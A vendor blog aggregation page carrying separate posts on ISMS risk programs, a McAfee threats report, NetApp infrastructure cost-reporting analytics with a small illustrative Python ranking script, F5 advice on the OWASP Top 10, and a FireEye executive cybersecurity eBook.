I have found that employees or consultants who do not spend 100% of their time on the ISMS provide limited value to a continuous risk program, unless the organization is very small. Business is constantly changing, and the risks change along with it. Not being in the "zone" constantly depletes the value of your risk program. So, where to from here?

Identify Your Assets / Ask the Right Questions

Breached organizations might ask these questions:

  • Did we focus on "the gold" (assets, as we like to call them in the information security world), such as customer credit card numbers and biometric data?
  • Did we fully understand the threats and risks to the business?
  • Was management made aware of the output of the above (if any)?

Risk management is ultimately there to protect an organization's key assets, so start by identifying them. Assets include information, processes, systems, infrastructure and people in the organization.

A significant impact to any of these can affect the core business and ultimately management's core objectives. Threats are not only IT's problem: they take advantage of vulnerabilities in any area of the business (Figure 2).

Figure 2: Layered security is key. Threats take advantage of vulnerabilities in any area of the business.

Start by asking:

  • What are my most sensitive assets?
  • What are my areas of highest risk to them?
  • How are we protecting those assets? Think across all four dimensions: people, process, technology and physical.
  • Does that approach make sense?
  • What risk (residual risk) remains and is that acceptable to management?

Following these fundamental questions and making decisions leads to building a security risk program.  Outlined below are solid building blocks for a program, with a focus on three key areas.

Building the Protection Program

ISO 27002

The first building block makes use of the ISO 27002 standard controls to focus on the relevant business areas and their baseline implementation guidelines. With over 100 controls outlined in detail, this provides an excellent starting point.

Documentation

This is a tough one, but establishing a solid program requires documentation that aligns with the business processes and is reviewed and approved by management. There are three main reasons why documentation helps build integrated security controls (and why it should not be treated as an add-on):

  • Gaining clarity of the actual processes
  • Officially assigning the control owners responsibility to perform the process and related controls, as outlined
  • Management review and approval of the new processes, generating commitment to the process via responsibility

NOTE: Generic purchased or provided documents are a great start, but unless they are tailored to your organization they are of little use. Refer to ISO 27001 for more details on the documentation process.

Team Effort

One cannot work in isolation when building the ISMS program.  You need a team effort and to rely on other risk-focused business areas of the organization similar to yours.  Your risk buddies include legal, IT and finance. There may be other risk partners, depending on the size of your organization.  The help of experienced internal or external assessors is an integral part of the team and enables one to perform technical assessments, audits and reviews to identify gaps and where threats can claim a victory.

Be Kind, Tough and Smart

Info security professionals must be kind, tough and smart (in no specific order). When building the security risk program many look at us—the auditor or compliance manager—as the enemy (or worse!). But like any good relationship, you must appreciate what each other brings to the table—understand each person has their own responsibilities and unique challenges in performing their job for the organization.

As the security SME, you will often need to stand your ground on security recommendations and best practices, but strive to do so in a matter-of-fact way. Once the security program begins to show value to the business and stakeholders, any adversarial feelings usually start to change. This does not happen overnight; it takes dedication and focus, and, as the subject matter expert, you are the one helping them manage their risks so they stay out of trouble.

Your smarts will help you shine: you will begin to gain the compliance managers’ trust; help keep them honest; and reduce the threats and business risks, which is the ultimate goal. In some cases, you will help to support their budget requests for resources, additional infrastructure, and more.

Useful Resources

Hopefully these tips prove helpful as you build out a security program and work with internal stakeholders and compliance team members. Below you’ll find links to additional information that could be useful.

ISO 31000 Risk Management

COSO Enterprise Risk Management



Author: David Lewis



The new McAfee Is Extending Our Stride

Category : Uncategorized

With McAfee’s spin-off from Intel completed, our focus has turned to growing the business. Our commitment to the strategy articulated more than two years ago remains unchanged. We are determined to deliver an increasingly integrated solution, to deliver on our product roadmap, and to work with both competitors and partners. We are making great progress toward those objectives.

In June, the WannaCry and Petya attacks struck, creating a firestorm of publicity and disrupting business operations around the globe. Among other things, they exposed the continued use of old and unsupported operating systems in critical areas and they laid bare the lax patch-update processes followed by some businesses. These attacks remind us that the best protection is defense in depth, including zero-day protection to not just block but quickly learn about attacks to improve responses. The lead Key Topic in this threats report analyzes WannaCry and its business impact.

McAfee Quarterly Threats Sept-2017



How to Uncover New Savings with Infrastructure Analytics

Category : NetApp

Business-level metadata is absolutely critical for controlling costs and deriving greater value from your IT infrastructure. For example, knowing that a certain storage system can provide the equivalent of $1 million worth of capacity isn’t particularly useful to anyone. However, if you can allocate and attribute that capacity down to the level of business units, users, or even individual developers, it creates awareness of where and how resources are being used. If you see that a business unit that isn’t contributing much to the bottom line is consuming more than its fair share of IT resources, someone in your company is likely to care about that. Ideally, you need to be able to tie every piece of physical infrastructure back to the activities of those who are using it, and at a granular level.

In a previous post, I discussed how OnCommand Insight (OCI) delivers business insights and control to help facilitate process-based automation. This time I want to show how OCI delivers business-level metadata that is helping customers enable new operating models and control costs.

Creative Cost Reporting Can Change Bad Behavior

Showback reporting has been a bit of a failure in many organizations. When a showback report arrives at the end of the month, it might show that a user or business unit asked for a certain number of virtual machines and that each of them cost $1,000. However, this type of reporting is often viewed as “funny money” that is used only for internal bookkeeping. When the people consuming the resources have no incentive to change their behavior, it remains business as usual.

This is where the idea of “shameback” reporting comes in. NetApp customers have used OCI to implement these types of cost awareness reports after they discovered that showback alone was not enough to change behavior. Instead of just providing a list of resources with a cost allocated to each resource, a shameback approach shows the delta between the resources requested by a user or business unit and the actual level of usage, along with a ranking of the worst offenders. For example, if a business unit requests a platinum VM, but could have satisfied its workload with a bronze VM, a shameback report created using OCI makes this difference clear for everyone to see.

A creative approach to cost reporting can lead individuals to change their behavior. No one wants to be at the top of the report, so they learn to become more intelligent about the resources they request. When applied across a large organization, this type of reporting can lead to better resource utilization and big savings.
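The shameback calculation described above, as an added illustration that is not OnCommand Insight code: each VM's requested tier is compared with the smallest tier its observed peak utilisation would have needed, and business units are ranked by the cost of that gap. The tier catalogue, prices, headroom policy and utilisation samples are all constructed for the example.

```python
"""Shameback ranking: compare the VM tier each business unit requested with
the smallest tier its observed peak utilisation would have needed, and rank
units by the cost of the gap. Added illustration, not OnCommand Insight code;
the tier catalogue, prices and utilisation samples are constructed."""
from dataclasses import dataclass

# Constructed tier catalogue: name -> (vCPUs, GiB RAM, monthly price in USD)
TIERS = {
    "bronze": (2, 4, 100.0),
    "silver": (4, 8, 250.0),
    "gold": (8, 16, 500.0),
    "platinum": (16, 32, 1000.0),
}
TIER_ORDER = ["bronze", "silver", "gold", "platinum"]  # smallest first


@dataclass
class VM:
    name: str
    owner: str        # business unit that requested the VM
    tier: str         # tier that was requested
    peak_cpu: float   # peak vCPUs observed in use over the billing period
    peak_mem: float   # peak GiB RAM observed in use over the billing period


def smallest_sufficient_tier(peak_cpu, peak_mem, headroom=1.25):
    """Smallest tier whose capacity covers the observed peak plus headroom.

    The 25% headroom is a constructed policy value; a real report would use
    whatever margin the organisation considers safe for the workload."""
    need_cpu, need_mem = peak_cpu * headroom, peak_mem * headroom
    for name in TIER_ORDER:
        cpus, mem, _price = TIERS[name]
        if cpus >= need_cpu and mem >= need_mem:
            return name
    return TIER_ORDER[-1]  # peak exceeds every tier: the largest is the best fit


def shameback(vms):
    """Per business unit: monthly spend requested, spend a right-sized tier would
    have cost, and the waste (the delta). Sorted worst offender first."""
    totals = {}
    for vm in vms:
        fit = smallest_sufficient_tier(vm.peak_cpu, vm.peak_mem)
        requested = TIERS[vm.tier][2]
        right_sized = TIERS[fit][2]
        row = totals.setdefault(vm.owner, {"owner": vm.owner, "requested": 0.0,
                                            "right_sized": 0.0, "waste": 0.0})
        row["requested"] += requested
        row["right_sized"] += right_sized
        # Only over-provisioning counts against a unit; an undersized VM is a
        # capacity problem, not waste, so its delta floors at zero.
        row["waste"] += max(0.0, requested - right_sized)
    return sorted(totals.values(),
                  key=lambda r: (-r["waste"], -r["requested"], r["owner"]))


# Constructed sample: one billing period across three business units
SAMPLE_VMS = [
    VM("web-01", "marketing", "platinum", peak_cpu=1.2, peak_mem=2.0),
    VM("batch-02", "marketing", "gold", peak_cpu=2.0, peak_mem=3.0),
    VM("db-01", "finance", "gold", peak_cpu=6.0, peak_mem=12.0),
    VM("ana-01", "finance", "platinum", peak_cpu=10.0, peak_mem=20.0),
    VM("ci-01", "engineering", "silver", peak_cpu=3.5, peak_mem=7.0),
]

if __name__ == "__main__":
    for rank, row in enumerate(shameback(SAMPLE_VMS), start=1):
        print(f"{rank}. {row['owner']:<12} requested ${row['requested']:>7.0f} "
              f"right-sized ${row['right_sized']:>7.0f} waste ${row['waste']:>7.0f}")
```

With the sample data, marketing tops the report: a platinum VM that peaks at 1.2 vCPUs would have fit in bronze, so most of its spend is counted as waste, while engineering's undersized CI box shows up as a capacity gap rather than waste.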

Cost Awareness Dashboard Example

Smart Metering Increases Utilization Rates

A customer I work with in the UK recently noticed that the usage of AWS cloud services was growing rapidly, while the demand for internal IT resources was falling. It is a development-heavy operation, and a lot of developers were going to AWS, buying VMs to support a project, putting it on their company credit cards, and claiming it as an expense. That approach created a problem for the IT team, because they were losing customers to the cloud. It was also a potentially ticking time bomb for the offending business units with regard to compliance, security, and unanticipated costs. When you have no idea where your data is, you have no way of knowing how much this type of “shadow IT” activity is costing.

In this case, the IT team wasn’t competing with AWS on price or capabilities. It all came down to flexibility and agility. To help address this problem, we created a billing system for the customer that was essentially a phone bill for IT. It showed daily storage charges in GB/hour and hourly VM, CPU, and memory costs. Each report used a similar template, and charges for CPU, memory, and storage resources were tied back to the developers in various development teams across the different business units.

For this customer, the next step in attacking the situation is likely to be smart metering. Here in the UK, a nationwide energy plan called Economy 7 is one example of how smart metering can be used to change behavior. The plan prices electricity rates cheaper at night, when demand is low, to encourage customers to shift their usage to off hours. Data center operators often find themselves in a similar situation, with excess capacity at night, or whenever the off-peak period falls for their operation.

By offering customers—whether internal or external—price incentives to run workloads during off hours, you not only gain an opportunity to win back or keep customers, but you can also accommodate more data center activity without having to build out new capacity, add infrastructure, buy additional virtualization licenses, and so on. It’s kind of a win-win for IT. Of course, this scenario only works if you have access to analytics that allow you to track usage at fine granularity. OCI provides this granular view into infrastructure utilization.

Make Your Business More Competitive

It’s difficult to compete with hyperscale cloud providers on the perceived cost of providing IT infrastructure services, but you can compete by offering flexible consumption and pricing options tailored to meet the needs of the business. OCI provides data insights that allow you to implement new operating models to control costs and increase the perceived value of your IT services, while helping to discourage shadow IT.

More Information

Discover how NetApp customers are benefiting from infrastructure analytics in these blog posts and by attending the NetApp Insight conference:


Author: Joshua Moore


Six Steps to Finding Honey in the OWASP

Category : F5

According to Verizon's 2014 Data Breach Investigations Report [1], "Web applications remain the proverbial punching bag of the Internet." [2] Things haven't improved much since then.

What is it about web applications that makes them so precarious? There are three primary answers. First, since most web applications are configured or coded specifically for the organizations they serve, they are more unique than commercial off-the-shelf software, which is often rigorously tested to a wide marketplace. Because of this uniqueness, developers must pay extra attention to each application in order to find and eliminate security problems.

Second, most web applications are available to the entire Internet, which means anyone, at any time, can poke and pry to try to break them. There are nearly 4 billion people on the Internet, and most of them primarily use the web [3]. That doesn't count enormous numbers of bots trawling the web every day; some say there are more bots than humans viewing sites [4]. If you have a website, someone (or something) is looking at it.

Third, the World Wide Web itself was never designed with robust security features. HTTP, the protocol underlying all web traffic, is stateless, meaning each request for data between client and server is independent of all previous requests. Add-on protocols and tools such as web cookies and session management trackers are needed to maintain consistency from when users first authenticate until they retrieve data [5]. As with all add-on tools, these are less than ideal solutions and can introduce gaps in coverage and capability.

Enter the OWASP Top 10, the most famous project of the Open Web Application Security Project (OWASP). A release candidate of the 2017 OWASP Top 10 [6] is out and due to be finalized in November. This new version updates the 2013 list by combining two old items, "Insecure Direct Object References" and "Missing Function Level Access Control," into a new item called "Broken Access Control." Another change is the dropping of item 10, "Unvalidated Redirects and Forwards," which is still a risk but considered less of a problem than it was in 2013. With these two modifications, the OWASP Top 10 has room for two more items: "Insufficient Attack Protection" and "Unprotected APIs."

These changes have generated a few unenthusiastic industry reactions, among them complaints that some of the new items are too broad or just plain unnecessary. OWASP, for its part, has done well in working through this feedback with a call for additional data and by extending the list’s release until November 2017. None of their work on the Top 10 is secret, so anyone is free to review and comment.

Beyond understanding the OWASP Top 10 security risks in relation to the web applications your organization builds and uses, what else should you be doing? There are a few simple steps you can follow to ensure long-term upkeep of OWASP issues.

1. Understand your OWASP scope.

OWASP is already part of numerous compliance requirements and contractual obligations. Review your legal agreements and regulatory environment to see what you might be legally obligated to do with OWASP. This may entail talking to your legal department and/or reviewing the contracts with them. There are numerous international security standards related to compliance that reference the OWASP Top 10, and you may fall under one or more of them. It's better to know now than have an unpleasant surprise later [7].

2. Scan all web applications.

Scan and test all the web applications your organization depends on against the OWASP Top 10. This means anything you’ve written and anything you use. If you’re using a third-party web application and depend on it, ask the vendor for a copy of their latest web application vulnerability test. If they don’t have one, speak to Legal about getting that requirement added to the next contract. If they haven’t done a scan, it’s likely they aren’t paying attention to vulnerabilities at all and that their application already has holes you don’t know about.

3. Share results.

Share your findings of the previous two steps with your company’s executive decision makers (at the very least, the CIO) as well as the development engineering team. Make sure your messaging is appropriate for each audience. Executives want to hear the bottom line regarding business risk and dependency, not technical detail. Developers want technical detail, especially the specific steps on how the vulnerability can be exploited and what an attacker can do with it.

4. Educate and inform.

Your web developers should be familiar with the OWASP Top 10, and OWASP Top 10 training may be contractually required by your company. Beyond telling the developers about the obligations and vulnerabilities you found, you should educate them on the entire OWASP Top 10 list. You can take this a step further and draft a security policy regarding web application security to help inform the entire technical and operational staff of its importance. Some of the key elements of such a policy can include:

  • All Internet-facing web-based applications will be tested against the OWASP Top 10 vulnerabilities at least once a quarter.
  • A secure coding standard based on industry best practices will be followed.
  • Developers will have adequate security training in the OWASP Top 10.
  • Developers will use threat modeling to look for common attacks, such as those described in the OWASP Top 10, to ensure their applications can defend against them.
  • IT will ensure that test data, default accounts, and passwords are removed or changed when web applications are deployed live.
  • Security vulnerabilities will be tracked, risk-reviewed, and fixed.
  • Periodic reviews and auditing will be done against this policy.

5. Firewall what you can’t fix.

Web application security can leverage specialized defensive tools, like web application firewalls that are specifically designed to analyze and block application attacks. They go beyond standard firewalls in that you program them to match the unique application requirements of your website. Some can also take data feeds from web application vulnerability scanners and do “virtual patches” by blocking previously uncovered but unmatched web vulnerabilities. The downside is that web application firewalls are complex and require customization to function correctly, but a lot of that work could be outsourced.

6. Become part of the OWASP community.

Join OWASP, attend a meeting, or, at the very least, review some of their material. The OWASP Top 10 is just a tiny part of the material generated by thousands of individuals and hundreds of companies over nearly two decades. There’s a lot of useful and inspirational material on their site.

Do you have issues with how the OWASP Top 10 list looks? Share your thoughts and contribute at

In general, the OWASP Top 10 falls into the category of “Basic stuff you should be doing so you don’t look negligent if you get hacked.” It represents the minimum level of web application security that you need to meet. Don’t get stung.

Author: Ray Pompon


The CyberAvengers Playbook

Category : FireEye

The Non-Technical, No Nonsense Guide For Directors, Officers, and General Counsels

Cybersecurity, as many organizations practice it today, is broken. Everybody is feeling the pressure as competitors and partners alike dread a breach. Leadership can’t be left in the dark due to technobabble, a lack of resources, or excuses as to why cyber risk cannot be measured.

FireEye is proud to support the new eBook, The #CyberAvengers Playbook: Doing the Little Things (and Some of the Big Things) Well (2017 Edition). This short guide is designed to give you actionable items that could help any organization improve its cybersecurity posture.

Download the eBook and pick up the following tips from the #CyberAvengers:

  • Oversight duties: Learn to view risk from an enterprise perspective in an era where accountability and fallout costs are surely going to grow.
  • Cyber risk: Why it matters and how to wisely spend your limited resources.
  • Communication gaps: Cybersecurity is not an IT-only issue, so do not be afraid to speak your mind. We show you which questions to ask.
  • Response and continuity: Even the best-tested plans can go out the window during a time of crisis. Learn to minimize the fallout.
  • What’s happening in 2017 and what to expect in 2018: From the ransomware scare to the General Data Protection Regulation (GDPR) coming into effect, business is becoming more expensive. We try to help you save wherever you can.